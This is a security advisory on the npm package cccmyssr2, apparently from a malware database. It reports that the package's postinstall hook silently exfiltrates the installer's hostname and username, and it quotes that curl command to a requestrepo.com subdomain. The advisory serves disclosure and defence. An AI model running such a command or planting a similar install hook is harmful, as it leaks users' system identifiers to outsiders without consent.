—

MAL-2026-6391

Malicious code in cccmyssr2 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03) On `npm install`, the package's postinstall.js executes `curl "http://r1x55270.requestrepo.com/pre?h=$(hostname)&u=$(whoami)"`, transmitting the installer's hostname and username over plain HTTP to an attacker-controlled requestrepo.com subdomain (a known DNS/HTTP exfiltration canary service). The package otherwise has no real functionality: index.js is a trivial 3-line date stub, package.json carries placeholder metadata ("A harmless utility package", empty author). The lifecycle hook fires automatically during install without consent, leaking host identifiers to a third party. This is the standard install-time reconnaissance/exfiltration shape.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / cccmyssr2

No fixed version published yet for cccmyssr2 (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/cccmyssr2/v/1.0.0 [PACKAGE]